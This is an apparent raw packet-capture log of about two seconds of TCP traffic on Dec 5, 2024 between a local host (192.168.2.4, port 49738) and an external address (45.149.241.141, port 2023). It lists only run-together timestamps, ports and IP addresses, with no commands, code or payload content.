                                                                                                                  Dec 5, 2024 10:46:37.714437962 CET497382023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:46:37.715569973 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:37.715657949 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:37.715701103 CET497382023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:46:37.716666937 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:37.716737986 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:37.716783047 CET497382023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:46:37.717788935 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:37.717817068 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:37.717875957 CET497382023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:46:37.718929052 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:37.718965054 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:37.719012022 CET497382023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:46:37.720153093 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:37.720220089 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:37.720266104 CET497382023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:46:37.721446037 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:37.721600056 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:37.722136021 CET497382023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:46:37.722444057 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:37.722565889 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:37.722611904 CET497382023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:46:37.723490953 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:37.723664045 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:37.723699093 CET497382023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:46:37.724603891 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:37.724713087 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:37.724759102 CET497382023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:46:37.725749016 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:37.725940943 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:37.725991964 CET497382023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:46:37.726970911 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:37.727123022 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:37.727166891 CET497382023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:46:37.728147030 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:37.728245020 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:37.728295088 CET497382023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:46:37.729491949 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:37.729587078 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:37.729625940 CET497382023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:46:37.730490923 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:37.730580091 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:37.730623960 CET497382023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:46:37.731617928 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:37.731758118 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:37.731803894 CET497382023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:46:37.732913971 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:37.733010054 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:37.733061075 CET497382023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:46:37.734113932 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:37.734440088 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:37.734498024 CET497382023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:46:37.735330105 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:37.735400915 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:37.735531092 CET497382023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:46:37.736181021 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:37.736196041 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:37.736248970 CET497382023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:46:37.737211943 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:37.737263918 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:37.737310886 CET497382023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:46:37.738325119 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:37.738384962 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:37.738429070 CET497382023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:46:37.739514112 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:37.739618063 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:37.739662886 CET497382023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:46:37.740632057 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:37.740758896 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:37.740801096 CET497382023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:46:37.741786957 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:37.741856098 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:37.741904020 CET497382023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:46:37.742924929 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:37.743061066 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:37.743168116 CET497382023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:46:37.744097948 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:37.744153976 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:37.744823933 CET497382023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:46:37.745136976 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:37.745210886 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:37.745258093 CET497382023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:46:37.746439934 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:37.746494055 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:37.746545076 CET497382023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:46:37.747127056 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:37.747210026 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:37.747260094 CET497382023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:46:37.748275995 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:37.748437881 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:37.748491049 CET497382023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:46:37.749437094 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:37.749509096 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:37.749553919 CET497382023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:46:37.750519037 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:37.805280924 CET497382023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:46:37.883114100 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:37.883161068 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:37.883373976 CET497382023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:46:37.883579016 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:37.883594036 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:37.883667946 CET497382023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:46:37.884434938 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:37.884588003 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:37.884677887 CET497382023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:46:37.885581970 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:37.885659933 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:37.886472940 CET497382023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:46:37.886727095 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:37.886851072 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:37.886919975 CET497382023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:46:37.887870073 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:37.888041019 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:37.888223886 CET497382023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:46:37.889000893 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:37.889118910 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:37.889192104 CET497382023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:46:37.890125036 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:37.890218973 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:37.890306950 CET497382023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:46:37.891283989 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:37.891391039 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:37.892219067 CET497382023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:46:37.892451048 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:37.892549992 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:37.892883062 CET497382023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:46:37.893548965 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:37.893769026 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:37.893840075 CET497382023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:46:37.894697905 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:37.894830942 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:37.894936085 CET497382023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:46:37.895864010 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:37.895955086 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:37.896008015 CET497382023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:46:37.897069931 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:37.897234917 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:37.897305012 CET497382023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:46:37.898107052 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:37.898283958 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:37.898824930 CET497382023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:46:37.899462938 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:37.899682045 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:37.899730921 CET497382023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:46:37.900839090 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:37.900899887 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:37.900953054 CET497382023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:46:37.901694059 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:37.901849031 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:37.901901960 CET497382023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:46:37.902719021 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:37.902802944 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:37.902877092 CET497382023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:46:37.903845072 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:37.903920889 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:37.903975010 CET497382023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:46:37.904954910 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:37.905071020 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:37.905122995 CET497382023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:46:37.906079054 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:37.906127930 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:37.906183958 CET497382023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:46:37.907226086 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:37.907267094 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:37.907351971 CET497382023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:46:37.908364058 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:37.908466101 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:37.908525944 CET497382023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:46:37.909493923 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:37.909735918 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:37.909795046 CET497382023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:46:37.910646915 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:37.910808086 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:37.910866022 CET497382023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:46:37.911813021 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:37.911993027 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:37.912050962 CET497382023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:46:37.913034916 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:37.913089991 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:37.913165092 CET497382023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:46:37.914184093 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:37.914272070 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:37.914535999 CET497382023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:46:37.915267944 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:37.915343046 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:37.915400982 CET497382023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:46:37.916332006 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:37.916424990 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:37.916472912 CET497382023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:46:37.917546988 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:37.917720079 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:37.917782068 CET497382023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:46:37.918642998 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:37.918669939 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:37.918731928 CET497382023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:46:37.919749975 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:37.919842958 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:37.919905901 CET497382023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:46:37.920953035 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:37.921027899 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:37.922027111 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:37.922096968 CET497382023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:46:37.922143936 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:37.922204018 CET497382023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:46:37.923192024 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:37.923289061 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:37.923346043 CET497382023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:46:37.924350023 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:37.924415112 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:37.924468040 CET497382023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:46:37.925487041 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:37.925586939 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:37.925654888 CET497382023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:46:37.926603079 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:37.926745892 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:37.926817894 CET497382023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:46:37.927824974 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:37.927881002 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:37.927989960 CET497382023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:46:37.928867102 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:37.928970098 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:37.929035902 CET497382023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:46:37.930032015 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:37.930113077 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:37.930233002 CET497382023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:46:37.931145906 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:37.931253910 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:37.931359053 CET497382023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:46:37.932284117 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:37.932391882 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:37.932466984 CET497382023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:46:37.933440924 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:37.933541059 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:37.933676958 CET497382023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:46:37.934644938 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:37.934761047 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:37.934812069 CET497382023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:46:37.935792923 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:37.935929060 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:37.936227083 CET497382023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:46:37.936929941 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:37.937068939 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:37.937118053 CET497382023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:46:37.938064098 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:37.938117981 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:37.938167095 CET497382023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:46:37.939100027 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:37.939212084 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:37.939256907 CET497382023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:46:37.940274954 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:37.940417051 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:37.940466881 CET497382023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:46:37.941354990 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:37.941500902 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:37.941541910 CET497382023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:46:37.942452908 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:37.992780924 CET497382023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:46:38.075222015 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:38.075361013 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:38.075544119 CET497382023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:46:38.075870991 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:38.075995922 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:38.076220989 CET497382023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:46:38.076925039 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:38.077016115 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:38.078126907 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:38.078211069 CET497382023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:46:38.078234911 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:38.078299999 CET497382023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:46:38.079335928 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:38.079360962 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:38.079452038 CET497382023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:46:38.080295086 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:38.080436945 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:38.080539942 CET497382023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:46:38.081509113 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:38.081583023 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:38.081690073 CET497382023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:46:38.082673073 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:38.082762003 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:38.082825899 CET497382023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:46:38.083708048 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:38.083811998 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:38.083918095 CET497382023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:46:38.084969997 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:38.085100889 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:38.085144043 CET497382023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:46:38.086055994 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:38.086196899 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:38.086245060 CET497382023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:46:38.087362051 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:38.087388992 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:38.087428093 CET497382023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:46:38.088565111 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:38.088608027 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:38.088656902 CET497382023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:46:38.089430094 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:38.089509964 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:38.089556932 CET497382023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:46:38.090586901 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:38.090652943 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:38.090699911 CET497382023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:46:38.091773033 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:38.091927052 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:38.091979027 CET497382023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:46:38.092895031 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:38.093077898 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:38.093185902 CET497382023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:46:38.093978882 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:38.094094038 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:38.094142914 CET497382023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:46:38.095163107 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:38.095263958 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:38.096208096 CET497382023192.168.2.445.149.241.141
